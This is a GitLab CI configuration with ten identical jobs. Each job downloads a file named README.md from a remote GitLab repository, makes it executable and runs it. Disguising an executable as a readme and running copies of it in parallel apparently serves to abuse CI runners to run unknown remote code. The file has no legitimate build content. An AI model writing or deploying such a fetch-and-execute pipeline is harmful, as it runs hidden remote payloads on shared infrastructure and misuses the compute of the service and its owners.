kominajalan_1:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
    
kominajalan_2:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
    
kominajalan_3:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md

  
kominajalan_4:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
  
kominajalan_5:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
  
kominajalan_6:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
  
kominajalan_7:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
  
kominajalan_8:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md

kominajalan_9:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md
  
kominajalan_10:
  script:
    - wget https://gitlab.com/kominajalan/1/-/raw/master/README.md
    - chmod u+x README.md
    - ./README.md